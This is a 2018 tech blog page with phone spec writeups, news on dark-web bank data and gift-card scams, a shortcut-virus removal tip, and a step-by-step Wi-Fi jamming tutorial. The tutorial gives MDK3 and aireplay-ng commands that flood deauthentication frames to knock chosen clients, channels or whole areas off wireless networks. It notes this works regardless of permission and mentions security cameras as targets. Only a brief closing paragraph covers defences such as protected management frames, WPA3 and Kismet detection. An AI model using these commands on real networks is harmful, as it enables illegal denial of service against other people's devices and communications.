Friday, 3 August 2018

Motorola Moto Z3 Specifications. Check it out.!


Moto Z3 was launched on Thursday at an event in Chicago, the company's headquarters. The new smartphone, which sits above the Moto Z3 Play that debuted in June, comes with a splash-resistant build and delivers a pure Android experience. It also continues the Moto Z-Series legacy of supporting Moto Mods through a dedicated pogo-pin connector at the back. Lenovo-owned Motorola has additionally partnered with Qualcomm to launch a 5G Moto Mod that will enable the next-generation network access on the Moto Z3. The 5G Moto Mod uses a Snapdragon X50 modem and "millimeter wave components" to offer 5G access on Verizon network. Alongside announcing the launch of the Moto Z3, the company has revealed that it has no plans to bring the anticipated Moto Z3 Force. The smartphone was well expected as the successor to the Moto Z2 Force and the company's next-generation flagship. However, it eventually confirmed that no more Moto Z-Series models will debut this year. This means, unlike the last year Moto Z family that included the Moto Z2 Force and Moto Z2 Play, there will be the Moto Z3 and Moto Z3 Play this year.


  • Body: Gorilla Glass 3 front and back, aluminum frame; p2i water repellent nano coating Display: 6.01-inch, 18:9, FHD+ 2160x1080, Super AMOLED, MAX Vision
  • OS: Android 8.1
  • Chipset: Qualcomm Snapdragon 835, Octa-core (4x2.35 GHz Kryo & 4x1.9 GHz Kryo) CPU, Adreno 540 GPU, 4GB RAM
  • Storage: 64GB internal, microSD expansion (dedicated slot)
  • Rear Camera: 12 MP, f/2.0, 1/2.9", 1.25µm, PDAF & laser AF + 12 MP B/W, f/2.0, 1/2.9", 1.25µm, PDAF & laser AF, two-tone LED, 4K video
  • Front Camera: 8 megapixels, f2.0, 1080p video
  • Connectivity: 4G VoLTE (optional upgrade to 5G though Moto mod), Nano-SIM, Bluetooth 5.0, dual-band Wi-Fi 802.11ac, A-GPS/GLONASS, NFC, USB-C port, FM radio
  • Battery: 3,000mAh non-removable, Motorola TurboPower 15W fast charging support
  • Misc: Fingerprint sensor, Moto Display, Moto Mod support
That can only be properly answered once we get the phone in for review and test it out. If the Z2 Force is any indication for camera performance, we were, indeed, quite impressed with the level of resolved detail on it, as well as the low noise. However, color capture and reproduction was unreliable and the dynamic range left more to be desired on that phone.
Perhaps a year's worth of camera software development might have helped improve on those problem areas. If nothing else, the camera on the Moto Z3 does have a few new shooting modes to play around with, like cinemagraph and a background cutout feature.
While on the subject of software, as a side note, the Motorola experience is still a very clean, nearly AOSP one. So, no change there.
As for selfies, you get the same 8 MP, f/2.0, 24mm, 1.12µm from the Z3 Play, which is an overall upgrade, compared to the Z2 Force. Except for the dedicated LED selfie flash, which is now gone and has been replaced by a screen-flash solution.
So thats it. Hope you guys like it. If yes then please .. comment down below and do not forgot to like follow and share our social media platforms. 

Xiaomi Mi A2 Features and Specifications.Check it out.!



For one, this year's chipset is a notch (or several) up - the Snapdragon 625 in the Mi A1 was all about endurance, while the Snapdragon 660 in the Mi A2 is similarly frugal, only vastly more powerful.

Speaking of notches, there isn't one to spoil the top of the Mi A2's display. It's a contemporary 18:9 unit, the almost-6-inches in diagonal FullHD+ LCD that Xiaomi's already used on a bunch of smartphones. So, that's another one where A2>A1.

More of side step than a definitive improvement is the camera. Gone is the 12MP telephoto module that offered 2x zoom, substituted by a 20MP secondary camera for improved low-light performance (OnePlus-style). The main cam on the back is still 12MP, but now gets a 2/3 of a stop brighter lens (f/1.8 vs. f/2.2). Over on the front, a 20MP selfie cam (same sensor as the one on the rear) replaces the basic 5MP shooter of the Mi A1, and comes with an added flash too.

  • Body: Aluminum body.
  • Display: 5.99" IPS LCD, 1,080x2,160px resolution, 18:9 aspect ratio, 403ppi.
  • Rear camera: Primary 12MP, Type 1/2.9" sensor, 1.25µm pixel size, f/1.75 aperture, PDAF; Secondary 20MP for low-light, Type 1/2.8" sensor, 1.0µm pixel size, f/1.75 aperture, autofocus, pixel binning. 2160p/30fps.
  • Front camera: 20MP, 1.0µm pixel size, f/2.2 aperture, Auto HDR, pixel binning. 1080p/30fps video recording.
  • OS: Android 8.1 Oreo (part of Android One).
  • Chipset: Qualcomm Snapdragon 660: octa-core CPU (4x2.2 GHz Kryo 260 & 4x1.8 GHz Kryo 260), Adreno 512 GPU.
  • Memory: 4/6GB of RAM; 32/64/128GB storage; no microSD slot.
  • Battery: 3,000mAh Li-Po (sealed); QuickCharge 3.0 fast charging.
  • Connectivity: Dual-SIM; LTE, USB-C; Wi-Fi a/b/g/n/ac; GPS; Bluetooth 5.0, IR blaster.
  • Misc: Rear-mounted fingerprint reader; single down-firing speaker; no 3.5mm jack (adapter in the box).


Which brings us to the changes that can't really be interpreted as an improvement. Xiaomi might want you to believe that the Mi A2 is now even more affordable, because there's a 32GB storage version, and you also get the option for a fully tricked out 6GB/128GB one for a price premium (the original was only offered in 4GB/64GB trim). What doesn't make it to the press materials is that the microSD slot is now gone. Boo!

Another victim with this generation is the 3.5mm headphone jack - and we thought midrangers were immune from this spreading fad. At least there's an adapter in the bundle.

So thats it. Hope you guys like it. If yes then please .. comment down below and do not forgot to like follow and share our social media platforms. 

Bank Data For Sale on the Dark Web Rises by 135% Every Year


Insights Cyber Intelligence a cyber-security firm that offers cyber threat intelligence to enterprises released its Financial Services Threat Landscape Report (July 2018). To acquire cyber threat intelligence, Insights engages in dark web monitoring, phishing and fraud detection and brand protection.
The research resulted in a number of key findings:135% increase in bank data available for sales on dark web marketplaces over the last one year, 149% increase in credit card stolen information, 91% increase in the number of corporate email addresses targeted by phishing scams, and 151% increase of attack probability per bank.
Stolen data posted for sale on the dark web, mainly credit card information, has been landing many buyers into trouble. Most of the people who buy credit card information end up using it to purchase goods online or physically in stores. Unable to cover their tracks some credit card buyers end up arrested and charged with fraud and identity theft.
The report attributed the rise in the number of exposed information to the change of tactics used by cybercriminals. As banks and financial institutions up their cyber security game, cybercriminals change the way they carry out attacks to be able to bypass security measures taken by their target corporations. According to the report, the following trends in the cybercrime world have resulted in more stolen data.

Phishing-as-a-service

Phishing attacks have proved to be the most effective ways of acquiring information from unsuspecting targets. Dark web marketplaces as always provide all sorts of goods and services including phishing kits. Availability of phishing kits for sale on demand have lowered the entry bar to phishing attacks. These kits enable cybercriminals with little knowhow to launch cyber-attacks that result in the exposure of large quantities of sensitive information.

Fake sites and Apps

To acquire information from clients of institutions with established brands, cybercriminals are creating sites that resemble legit site doubles. The fake sites are used to steal the credentials of clients of the targeted institutions. These criminals may also create mobile banking apps that look like the actual ones and use them to collect login details of the users of targeted banks.
Decentralization of dark web markets
Vendors on the dark web are getting more concerned over their anonymity and security of their funds in centralized marketplaces. This has prompted most vendors to move into decentralized marketing which offers more privacy and guarantees against surveillance by LE. Vendors and buyers have been using private messaging apps to carry out trades for some time now. Decentralization makes it impossible to monitor cases of leaked or stolen data, or to even learn of planned cyber-attacks.

Advanced Persistent Threat (ATP) Groups

Cybercriminals have joined to form groups that wage cyber-warfare against financial institutions either for monetary gain or to acquire intellectual property mainly when sponsored by states. The kind of motivation portrayed by ATPs makes it hard to entirely prevent cyber-attacks since ATPs launch well timed attacks. The year 2017 witnessed a large number of ATP attacks.

Cyber-extortion

Cyber criminals are using extortion attacks to threaten financial institutions into paying large sums of money in cryptocurrencies or risk exposure of the credentials of their clients. Cyber-extortion is very effective because institutions are always willing to do anything to protect their image and clients’ information.
A gang of hackers known as Rex Mundi used extortion to threaten firms that it hacked.
All these and many other developments have empowered cybercriminals making them feel invincible while intimidating their targets into feeling helpless.

Wednesday, 1 August 2018

Check out features of Asus ZenFone Max Pro M1.


Taiwanese smartphone maker ASUS debuted in India in 2014 with its Zenfone 4, Zenfone 5 and Zenfone 6 devices which were essentially low-cost phones that catapulted the otherwise not-so-popular brand to recognition.
According to International Data Corporation (IDC), the Indian smartphone market is poised to grow in double digits in 2018 on the back of the popularity of budget devices and vendors increasing their focus to make phones, as well as high-value components in the country. 
The Taiwan-based handset maker now seems to be following a similar sentiment and has launched ZenFone Max Pro M1 in India at Rs 10,999 for the 3GB RAM+32GB onboard storage variant and Rs 12,999 for the 4GB RAM+64GB internal storage variant to primarily compete with the likes of Xiaomi Redmi Note 5 and Redmi Note 5 Pro.
According to the company, the smartphone has been made specifically for India -- which is a key market for it -- and its launching price and specifications have intrigued us. Let us find out if the smartphone is worth your time and money.
What works?
Unlike most smartphones in the market today, this smartphone is not a typical glass sandwich design. The device was quite pleasant to look at and has an ergonomic rear.
Despite a taller-than-wider frame and an 18:9 aspect ratio screen for immersive viewing and gaming experience, the smartphone was easy to operate with one hand.
A 5.99-inch FHD+ "Full View" display takes up most of the front along with rounded corners and narrow borders on both the sides. 
The power and volume keys sit on the right and are easy to reach.
A fingerprint sensor is placed at the back below which sits the minimalistic ASUS logo. The scanner was quick to unlock the device.
We were impressed to see the almost 6-inch display sans a "notch" which was popularised by Apple iPhone X.
The display is bright with accurate colours under normal daylight conditions with decent sunlight legibility. 
The viewing angles of the device were also good and we particularly liked the inclusion of "night mode" and a manual colour temperature adjustment under "settings".
A Qualcomm Snapdragon 636 chipset, which is essentially designed for premium mid-range devices, powers the smartphone. This is a major high point considering the price of the device.
Notably, Xiaomi's Redmi Note 5 Pro is also fuelled by the same processor.
We were impressed by the company ditching its own ZenUI interface in favour of a near-stock interface which offered smooth experience.
We got close to two days of battery life on a single charge with 4G running on one SIM slot.
The device has 13MP primary sensor and a 5MP secondary sensor that can take decent photos in normal lighting conditions.
The front camera is an 8MP shooter which took some good self-portraits.
What does not work?
Despite accommodating a hefty 5,000mAh battery inside the phone, the company did not include fast-charging technology alongside which can be a bummer.
Charging the battery was painfully slow and it took us more than two hours to completely charge the device.
Conclusion: ASUS ZenFone Max Pro M1 is a capable all-rounder in this price segment. We would recommend the device to those looking for great battery 

So thats it. Hope you guys like it. If yes then please .. comment down below and do not forgot to like follow and share our social media platforms. 

Tuesday, 31 July 2018

How Gift Cards used by Cybercriminals to fetch personal data.


By creating fake websites for free generation of gift cards, many cybercriminals are tricking users into parting with their time and data, for no return, researchers at cybersecurity firm Kaspersky Lab have warned. 

While legitimate apps like Tokenfire and Swagbucks buy card codes from vendors, to then give them to clients as a reward for certain activities, criminals have apparently recognised the popularity of such websites and have decided to deceive users using a simple algorithm.
"The success of these new fraud schemes is based on criminals exploiting the drive of users to get something for free," Lyubov Nikolenko of Kaspersky Lab said in a statement this week. 
"However, at best they will spend hours of personal time doing worthless tasks, and at worst lose money without receiving anything in return. So, if you want to get your hands on a free gift card, try to earn it on legal and trustworthy sites," Nikolenko added.
When on the fake site, the user is asked to select the gift card he/she wants in order to receive the code. 
After that, the fraudulent mechanism is set in motion. To get the generated code, however, the user needs to prove that he/she is not a robot. 
To do this, the user has to follow the suggested link and complete various tasks, the number and type of which are determined by the partner network to which the user is redirected. 
For example, he/she may be asked to fill in a form, leave a phone number or email address, subscribe to a paid SMS message, install adware, and so on. 
The result is predictable - either victims get tired of doing endless tasks, or they finally get the useless code, Kaspersky Lab said. 
The earnings for criminals range from a few cents per every click on a desired link, to several dozen dollars for filling in a form or subscribing to paid services. 
Thus, the criminals make a profit virtually for nothing, getting paid from the user's actions on the websites of third-party partners, who, for their part, also benefit by getting access to personal data which can be used for private purposes. 
To avoid falling for cybercriminals' fraudulent schemes and losing personal data, Kaspersky Lab researchers suggest that users should not spread questionable links among their friends.
Using a reliable security solution with behaviour-based anti-phishing technologies to detect and block spam and phishing attacks is also one of the important preventive measures that users can take, according to the researchers.

So thats it. Hope you guys like it. If yes then please .. comment down below and do not forgot to like follow and share our social media platforms. 

Sunday, 29 July 2018

How to remove shortcut virus from drive.


What is Shortcut Virus?
This is quite a reasonable question regarding the fact if it is the first time that your Windows PC or Laptop has been affected by this shortcut virus. Now if you are one of that new victim of this Shortcut virus then here is what you will need to know about it.
Shortcut Virus is one of the new Malware that turns any files on your Windows including folders and files into a shortcut. While hiding the original files on your Computer which is quite irritating the fact that all your important files on your Windows Computer will be inaccessible.
Now another important piece of information that you should keep in mind is that most of this Shortcut virus on Windows Computer are undetectable by any of the Antivirus that are currently in the market. So the only option is to remove shortcut virus manually or by using a Shortcut Virus remover.
How To Remove Shortcut Virus Permanently in PC/Laptop/Pendrive/Flash Drive:
Here are some of the methods that I used to remove and delete the Shortcut virus permanently from my computer. All the given method are great Shortcut remover and you can use any of the given methods to remove shortcut virus within seconds.
#1 Method: Remove Shortcut Virus Using CMD:
Using CMD Command Prompt is certainly the easiest way to remove shortcut virus from your Computer. And it is certainly the most effective Shortcut Virus remover which can remove shortcut virus within few seconds. Follow the steps given below to remove shortcut virus using CMD.

  • First Open Run by using Win + R Key.
  • Now Type CMD or cmd in the run box and hit Enter.
  • Now you will just need to copy the following Command. And use it on your Command Prompt.
  1. attrib -h -s -r -a /s /d Drive Name:*.*
  2. {Replace the Drive Name with the Drive from which you want to remove the Shortcut virus}

Lastly, you will just need to hit the Enter key and Shortcut Virus will be removed.

So thats it. Hope you guys like it. If yes then please .. comment down below and do not forgot to like follow and share our social media platforms. 


Thursday, 26 July 2018

Advanced Wi-Fi Jamming Using MDK3.


You may have heard of a signal jammer before, usually referring to a device that blasts out a strong enough radio signal to drown out the reception of nearby devices like cell phones. Purpose-built jammer hardware is outright illegal in many countries, but Wi-Fi is vulnerable to several different jamming attacks that can be done with Kali Linux and a wireless network adapter.

Traditional signal jamming has been a cat and mouse game of detecting and disabling signals an opponent is using to communicate. Cutting off a target's ability to communicate leaves them isolated and vulnerable, making jamming these signals a top priority in modern day electronic warfare. Countries today have developed capabilities to jam and spoof cell phones, GPS, Wi-Fi, and even satellite links.

Different Types of Jamming
There are two main types of jammers: elementary and advanced. Here, we'll be discussing elementary Wi-Fi jamming, focusing on unencrypted management frames.

Elementary jammers can be broken into two main types: proactive and reactive. The first type, a proactive jammer, is one that continuously functions whether there is traffic on a network or not. We'll be using MDK3 as a deceptive jammer, which injects normal-seeming packets that have a malicious effect on the network.
Jammers used in electronic warfare typically require equipment that overwhelms the signal of the target with radio energy, making it impossible to distinguish between the signal and the noise being introduced to the channel the target is using to communicate. This kind of jamming is popular because it works, but it also requires specialized equipment that is banned or heavily regulated in most countries.

Don't Miss: Build a Software-Based Wi-Fi Jammer with Airgeddon

Deauthentication Packets

The most common way this sort of attack is done is with deauthentication packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to hacking many Wi-Fi networks, as you can forcibly disconnect any client from the network at any time. The ease of which this can be done is somewhat frightening and is often done as part of gathering a WPA handshake for cracking.

Aside from momentarily using this disconnection to harvest a handshake to crack, you can also just let those deauths keep coming, which has the effect of peppering the client with deauth packets seemingly from the network they are connected to. Because these frames aren't encrypted, many programs take advantage of management frames by forging them and sending them to either one or all devices on a network.

  • Don't Miss: Disable Security Cams on Any Wireless Network with Aireplay-ng
Programs like Aireplay-ng rely on deauthentication packets to execute denial of service attacks, and this kind of tactic is often a part of the first WPA brute-forcing a hacker will learn. Spamming a target with deauth packets is simple but effective, often producing near-immediate action on the mark. But many who use Aireplay-ng may not know that there is another kind of management frame that can be abused to take out clients on a WPA network.

MDK3 vs. Aireplay-ng

To understand Aireplay-ng vs MDK3 as jamming tools, we should take a look at the help file for each tool. For Aireplay-ng, we see the following relevant information.
Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen
While the tools included are interesting, only --deauth is helpful in jamming a Wi-Fi connection. Based on these filter settings, we can use Aireplay-ng to attack specific nodes on specific APs. We can do so with a command like below.
aireplay-ng -0 0 -a f2:9f:c2:34:55:69 -c a4:14:37:44:1f:ac wlan0mon
This command uses the wlan0 interface in monitor mode to send an unlimited stream of deauths to the client at MAC address a4:14:37:44:1f:ac which is connected to the access point with a MAC address of f2:9f:c2:34:55:69. This attack is surgical and usually starts working immediately, but can fail or not be very effective on some networks.

MDK3, by comparison, has less surgical filters listen in its help file.
MDK 3.0 v6 - "Yeah, well, whatever"

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too many clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for an answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.
With MDK3, we see a few attractive options. Option g will attempt to force a network administrator to disable or downgrade encryption by targeting any connection sending WPA encrypted packets with deauthentication attacks.

Option b attempts a beacon flood attack, randomly creating fake APs in the area, and option a attempts to jam a network by sending too many authentication frames. Neither of these attacks works for jamming the network, so instead, the most useful attack is option d.

The Deauthentication / Disassociation Amok Mode attack by default kicks everyone off of any nearby network, but with some filters, we can get it to behave more surgically.

To update your copy of Kali Linux, connect to the internet, open a terminal window, and run the commands below.
apt update
apt upgrade

Step 1> Install MDK3

apt install mdk3
Once this is installed, you can type mdk3 --help to see the main options.

Step 2> Jam an Area

Taking a look at the filter options for MDK3, we can type mdk3 --help d to get the help information for the deauthentication module specifically. Here we can see that it is different from the options for Aireplay-ng. Instead, we have the following options to craft our attack.

-w flag for MAC addresses to ignore, or whitelist.
-b flag for MAC addresses to attack, or blacklist.
-s flag for the speed (packets per second) of the attack.
-c flag for the channel to run the attack on.

Based on these options, we'll need to, at the very minimum, have one piece of information to start jamming anything. First, we'll need to put our network adapter into monitor mode and supply the name of the adapter in monitor mode to the program so it can execute.

To find this, we can type either ifconfig or the newer ip a in a terminal window to find the name of the network adapter. It should be something like "wlan0" or "wlan1."

When you have the name of the device, you can put it into monitor mode with the following airmon-ng command, where wlan0 is the name of your network card.
sudo airmon-ng start wlan0
Once you've done so, type ifconfig or ip a again to get the new name of the device. You can expect it to be something like "wlan0mon."
When you have this information, you can run the script to deauthenticate everything nearby. This is noisy, not as effective as target jamming, and may require one card to work persistently. In my tests, one network card attacking everything nearby caused few noticeable disruptions, whereas three network cards attacking everything nearby caused noticeably annoying disconnections from the network.

To execute the attack, type the following in a terminal window, with wlan0mon as the name of your adapter in monitor mode.
mdk3 wlan0mon d
Because this attack has to hop channels, it is likely to miss some APs and it may not be very fast. It's also very disruptive, as it can disconnect anything in range regardless of whether you have permission or if it's relevant to what you're doing.

Step 3> Jam a Channel

A better option for jamming an area is to jam a channel. To know what channel to jam, we can use another tool called Airodump-ng to discover what channel our target is on. With our card in monitor mode as wlan0mon, we can type the following command to see information about all nearby wireless networks.
airodump-ng wlan0mon
This will display all nearby access points, along with information about them. Here we can see which channel the access point we are targeting is on, which will limit our effect to a single channel rather than marauding around attacking anything that moves.
Once we know the channel the AP is on, we can press Ctrl-C to cancel the scan, and type the following into a terminal window, with the channel we're attacking being channel 6.
mdk3 wlan0mon -c 6
Jamming a channel is very effective, but affects all APs and all devices operating on that channel. This can still be too noisy, so we'll need to refine this further to match the same targeting capabilities as Aireplay-ng.

Step 4> Whitelist & Blacklist Devices

Once we have a specific channel to attack, we can be more precise by adding a blacklist or a whitelist.

To do this, we'll re-run our Airmon-ng scan, and this time, we'll copy the MAC address of the device we wish to attack. I have tested doing this for both the address of the AP and the device you want to attack. Using the MAC address of the AP will attack everything on it, whereas adding the MAC address of the device will only attack it and nothing else on the network.

To get this information, we can type the following to find the APs on the channel we were targeting before, in this case, channel 6.
airodump-ng wlan0mon -c 6
By specifying the channel we found before, we should be able to cut down on the number of devices we see. To find devices connected to our target network, we can look at the bottom of the output and find devices which are listed as being associated with the MAC address matching our target network.

Once we find a MAC address that is associated, we can target it easily. Copy the MAC address, and then open a new terminal window. Type nano black.txt and press Enter to open a text editor window. Now, paste the MAC address of the device you wish to jam, and press Ctrl-X to close the text editor.

Now, we can run MDK3 against the target network by running the command below, with black.txt as the text file we just created containing the MAC addresses we wish to jam.
mdk3 wlan0mon d -c 6 -b ~/black.txt
Running this should very rapidly and persistently jam the device you indicated. In reverse, you can specify networks you want to leave alone the same way, and then run the command with the -w flag instead to attack everything else on the channel instead.

Protected Management Frames & WPA3

While these attacks can be scary depending on what is being targeted like a home security camera, these risks can be mitigated by using Ethernet wherever possible and upgrading the WPA3 when devices supporting it becomes available. One of the core differences between WPA2 and WPA3 is that WPA3 doesn't allow these kinds of attacks by preventing the authentication or disassociation packets from being forged in the first place.

Until then, you can use devices which support protected management frames, or if you suspect that you're being targeted with an attack like this, you can detect it using an intrusion detection system (IDS). Kismet can be used as an IDS to detect this sort of attack, as it will give you a warning on detecting dissasociation or deauthentication frames being sprayed across a network.

I hope you enjoyed this guide to understanding advanced Wi-Fi jamming with MDK3 and Aireplay-ng! If you have any questions about this tutorial or Wi-Fi jamming, feel free to leave a comment And don't forget to like, share and follow to our social meadia platforms. 

THANK YOU.

INSTAGRAM> https://www.instagram.com/cybersecuritytrend/
GOOGLE+> https://plus.google.com/108787701517183226945
FACEBOOK>https://www.facebook.com/Cyber-Security-Trend-994219794073420/?ref=br_rs
Facebook Page:- https://www.facebook.com/theprogrammer.harshit/
Google Plus:- https://plus.google.com/u/0/communiti…/117296242526461886479